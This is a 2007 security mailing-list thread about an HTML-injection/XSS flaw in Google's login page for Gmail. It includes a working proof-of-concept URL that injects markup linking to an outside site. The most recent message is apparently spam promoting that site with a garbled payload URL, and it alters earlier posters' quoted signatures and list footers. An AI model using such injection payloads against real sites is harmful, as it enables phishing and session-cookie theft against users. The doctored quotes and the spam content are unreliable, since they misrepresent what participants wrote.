Yes all XSS is very serious and not for making jokes, if pdp said that hacker can steal data the CSS on google could be very damgerous vulnerability
Blackhat SEO XSS <http://www.xssworm.com:80/?index?blackhat=seo#extreme>hacker example: http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@!&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@!&q=http://xssworm.com/&seo=blackhat<http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@%21&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/[EMAIL PROTECTED]@@[EMAIL PROTECTED]@%21&q=http://xssworm.com/&seo=blackhat> Please if you search XSS hacking also visit XSSWORM.COM here: http://xssworm.com we have updates with blackhat and whitehat video with XSS hacking tutorial by blackhat[2] Sunjester frome litehackers.info vaj -- Francesco Vaj [CISSP - GIAC] CSS Security Researcher - xssworm.com mailto:[EMAIL PROTECTED] aim: XSS Cross Site ------ [2] http://xssworm.blogvis.com/9/xssworm/what-is-a-blackhat-hacker-and-where-are-black-hats-hacking/ On Nov 9, 2007 8:36 AM, pdp (architect) <[EMAIL PROTECTED]> wrote: > well this XSS can lead to so much data being stolen that it is not even > funny! > > > On Nov 8, 2007 8:55 PM, Juergen Marester <[EMAIL PROTECTED] > > wrote: > > > wow ! 0day ! > > damn, 0day, XSS ... > > > > > > On 11/8/07, silky <[EMAIL PROTECTED]> wrote: > > > > > > worked for me minutes after it was posted. seems fixed now. > > > > > > On 11/9/07, crazy frog crazy frog < [EMAIL PROTECTED]> wrote: > > > > i tested xssworm on gmail latest version > > > > > > > > On Nov 8, 2007 7:04 AM, Scripter Hack <[EMAIL PROTECTED] > wrote: > > > > > There is a html injection video in > > > > > https://www.xssworm.com<https://www.google.com> > > > . > > > > > It is very critical,you can get the cookie to login into gmail or > > > other > > > > > service. > > > > > > > > > > POC: > > > > > > > > https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default<mplcache=2&passive=truel# > > > "><h1><a%20href=//xssworm.com/>xssworm</a></h1> > > > > > > > > > > More:http://[EMAIL PROTECTED]/<http://xss2root.blogspot.com/> > > > > > _______________________________________________ > > > > > Full-Disclosure - We believe in it. > > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > > > > > > > > > > > > -- > > > > why advertise on secgeeks? > > > > http://[EMAIL > > > > PROTECTED]<http://secgeeks.com/Advertising_on_Secgeeks.com> > > > > http://newskicks.com > > > > > > > > _______________________________________________ > > > > Full-Disclosure - We believe in xss. > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > Hosted and sponsored by Secunia - > > > > http://xssworm./secunia.com/<http://secunia.com/> > > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > pdp (acronym) | petrol v. petco > http://www.xssworm.com <http://www.gnucitizen.org> > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
